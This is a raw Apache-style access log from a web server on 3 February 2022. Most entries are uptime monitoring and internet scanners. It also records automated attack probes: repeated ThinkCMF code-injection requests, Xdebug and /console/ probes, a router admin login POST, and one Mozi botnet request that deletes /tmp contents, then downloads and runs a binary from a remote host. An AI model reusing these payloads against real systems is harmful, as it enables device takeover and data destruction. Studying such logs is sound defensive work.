212.91.246.72 - - [03/Feb/2022:10:01:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:01:45 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:02:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:02:45 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:03:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:04:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:04:34 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:05:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:05:42 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:10:05:59 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:06:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:07:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:09:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.171.150.168 - - [03/Feb/2022:10:09:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.69.98 - - [03/Feb/2022:10:09:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
198.20.69.98 - - [03/Feb/2022:10:09:11 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.69.98 - - [03/Feb/2022:10:09:11 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
198.20.69.98 - - [03/Feb/2022:10:09:12 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
198.20.69.98 - - [03/Feb/2022:10:09:14 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [03/Feb/2022:10:10:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.248.32 - - [03/Feb/2022:10:10:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [03/Feb/2022:10:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:12:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:13:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:14:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [03/Feb/2022:10:14:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:15:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:15:26 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
183.136.225.56 - - [03/Feb/2022:10:15:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Feb/2022:10:16:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.171.150.168 - - [03/Feb/2022:10:17:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Feb/2022:10:18:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:18:24 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:10:18:38 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:19:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.129.64.214 - - [03/Feb/2022:10:19:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:20:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:21:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:22:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:23:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:24:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:25:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.220.101.60 - - [03/Feb/2022:10:25:14 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:10:25:18 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:26:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.108 - - [03/Feb/2022:10:26:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Feb/2022:10:27:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.108 - - [03/Feb/2022:10:27:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.108 - - [03/Feb/2022:10:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Feb/2022:10:28:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.108 - - [03/Feb/2022:10:28:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.108 - - [03/Feb/2022:10:28:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
62.171.150.168 - - [03/Feb/2022:10:29:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Feb/2022:10:29:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.108 - - [03/Feb/2022:10:29:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.108 - - [03/Feb/2022:10:29:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Feb/2022:10:30:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.108 - - [03/Feb/2022:10:30:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.108 - - [03/Feb/2022:10:30:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
167.248.133.62 - - [03/Feb/2022:10:30:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.62 - - [03/Feb/2022:10:30:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.62 - - [03/Feb/2022:10:30:50 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Feb/2022:10:31:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:32:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:33:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:34:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:35:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:35:18 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:36:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:37:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:38:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:39:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:40:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:40:12 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:10:40:57 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:41:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:42:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:43:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:43:30 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [03/Feb/2022:10:43:41 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:44:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [03/Feb/2022:10:44:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:45:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:46:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:47:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:48:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:49:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.202.100.159 - - [03/Feb/2022:10:49:53 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://42.202.100.159:33029/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [03/Feb/2022:10:50:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:50:30 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:51:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [03/Feb/2022:10:51:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
178.62.69.128 - - [03/Feb/2022:10:51:54 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Feb/2022:10:52:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:52:35 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.195.93.98 - - [03/Feb/2022:10:52:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
193.118.53.194 - - [03/Feb/2022:10:52:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:53:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:54:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:10:54:28 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:55:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:56:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:57:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.248.42 - - [03/Feb/2022:10:57:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:10:58:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:10:59:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:00:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:01:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
130.211.54.158 - - [03/Feb/2022:11:02:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [03/Feb/2022:11:02:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.195.93.98 - - [03/Feb/2022:11:02:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [03/Feb/2022:11:03:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:04:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:05:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:06:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:07:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:09:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:10:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:11:35 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:12:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:13:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.197.132.244 - - [03/Feb/2022:11:13:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:14:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.244.208.76 - - [03/Feb/2022:11:14:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:15:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:15:28 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:16:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:16:37 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
136.144.41.117 - - [03/Feb/2022:11:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Feb/2022:11:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:18:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:19:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:20:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:21:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:22:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:23:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:23:33 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:11:24:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:25:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [03/Feb/2022:11:25:24 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [03/Feb/2022:11:25:24 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [03/Feb/2022:11:26:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:27:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:11:28:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
136.144.41.117 - - [03/Feb/2022:11:28:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Feb/2022:11:29:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:11:30:02 +0100] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
